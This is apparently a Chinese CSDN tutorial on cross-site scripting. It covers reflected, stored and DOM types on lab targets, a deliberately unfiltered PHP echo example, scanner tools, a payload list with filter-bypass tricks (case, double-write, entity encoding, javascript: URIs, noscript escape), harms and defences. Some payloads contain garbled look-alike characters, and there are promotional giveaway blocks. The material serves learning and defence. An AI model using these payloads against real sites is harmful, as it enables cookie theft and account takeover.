网络安全-XSS的原理、攻击及防御

简介

跨站脚本攻击(全称Cross Site Scripting,为和CSS（层叠样式表）区分，简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码（也可能包含html代码），当用户浏览网页之时，嵌入其中Web里面的JavaScript代码会被执行，从而达到恶意攻击用户的目的。XSS是攻击客户端，最终受害者是用户，当然，网站管理员也是用户之一。

XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中，通过用户本地浏览器执行的，所以xss漏洞关键就是寻找参数未过滤的输出函数。

php中常见的输出函数有：

• echo
• printf
• print
• print_r
• sprintf
• die
• var-dump
• var_export

所用工具

Google出品：开源Web App漏洞测试环境：Firing Range

靶机：dvwa、pikachu

XSS的类型

反射型XSS/不持久型XSS

选择的是echo函数，不加过滤，直接输出

input.php

<?php 
$input = $_GET['input'];
echo 'output:<br>'.$input;
?> 

可以看到我们的输入直接被输出。 那么，如果我们的参数是JavaScript代码呢？

<script>alert('xss attack by lady_killer9')</script>

也就是说js能够做到的事情，都可在这里插入去实现，比如跳转到钓鱼网站。

 Firing Range的Html Body存在的反射性XSS

下面是在dvwa中的展示

【一>所有资源获取，点击这里<一】
1、很多已经买不到的绝版电子书
2、安全大厂内部的培训资料
3、全套工具包
4、100份src源码技术文档
5、网络安全基础入门、Linux、web安全、攻防方面的视频
6、应急响应笔记 7、 网络安全学习路线
8、ctf夺旗赛解析
9、WEB安全入门笔记 

存储型XSS/持久型XSS

和反射型XSS的即时响应相比，存储型XSS则需要先把代码保存到数据库或文件中，下次读取时仍然会显示出来，利用的问题依然是没有对用户的输入进行过滤。使用靶机pikachu的存储型xss。

<script>alert(document.cookie)</script>

 

基于DOM的XSS

基于文档对象模型(Document Object Model，DOM)的一种漏洞。客户端的脚本可以通过DOM动态地修改页面内容，它不依赖于提交数据到服务器，而是从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM型XSS漏洞。

HTML DOM就像数据结构中的树，有根节点，叶子节点等，通过document对象进行写入。

使用F12查看，发现是把id为text的输入框的内容显示出来。单引号闭合即可，而且F12的时候就直接看见了。

提示给的是

'onclick="alert('lady_killer9')">

 我使用的是

'onclick='alert('lady_killer9')

常用Payload与工具

XSS扫描工具

• XSStrike
• beef
• XSS Scanner Online
• XSSer
• xsscrapy
• BruteXSS Terminal
• BruteXSS GUI

 工具不在于多，学一个就可以了

Payloads

script标签类

对于没有过滤的很简单的XSS漏洞，可以使用

<script>alert(“XSS”)</script>

有的时候会过滤掉script，大小写、双写等无法绕过，可使用后面的payload。

结合js的html标签

可结合一些onclick、onerror等事件

<IMG οnmοuseοver="alert('xxs')">

<img src=xss οnerrοr=alert(1)>

伪协议

上面的都不行的话，可以试试伪协议

<IFRAME SRC="javascript:alert(1);"></IFRAME>

<IMG DYNSRC="javascript:javascript:alert(1)">

绕过

大小写绕过

<scRipt>alert(“XSS”)</scRipt>

双写绕过

<scrscriptipt>alert(“XSS”)</scrscriptipt>

html编码绕过

<script>alert(“XSS”)</script>

等价于

 <script>alert("XSS")</script>

<a href=javascript:alert(2)>a</a>

等价于

<a href=javascript:alert(2)>a</a>

标签优先级绕过

<noscript >标签比<img>标签解析优先性更高，所以</noscript >会优先闭合，导致<img>标签逃逸，从而造成xss执行

<noscript><img src="asdasd</noscript><img src=* οnerrοr=prompt(1)>"></noscript>

危害

1. 用户的Cookie被获取，其中可能存在Session ID等敏感信息。若服务器端没有做相应防护，攻击者可用对应Cookie登陆服务器。
2. 攻击者能够在一定限度内记录用户的键盘输入。
3. 攻击者通过CSRF等方式以用户身份执行危险操作。
4. XSS蠕虫。
5. 获取用户浏览器信息。
6. 利用XSS漏洞扫描用户内网。

防御

• 标签过滤
• 事件过滤
• 敏感字符过滤
• 设置httponly防止Cookie被获取
• 内容安全策略（CSP）
• 在将不可信数据插入到HTML标签之间时，对这些数据进行HTML Entity编码
• 在将不可信数据插入到HTML属性里时，对这些数据进行HTML属性编码
• 在将不可信数据插入到SCRIPT里时，对这些数据进行SCRIPT编码
• 在将不可信数据插入到Style属性里时，对这些数据进行CSS编码

当然，如果过过滤不全，或者CSP配置错误，也可能被绕过。

最后，给大家整理了一些学习籽料教程等，这份完整版的网安学习资料已经上传，朋友们如果需要可以微信扫描下方CSDN官方认证二维码或者点击链接免费领取【保证100%免费】

CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费领取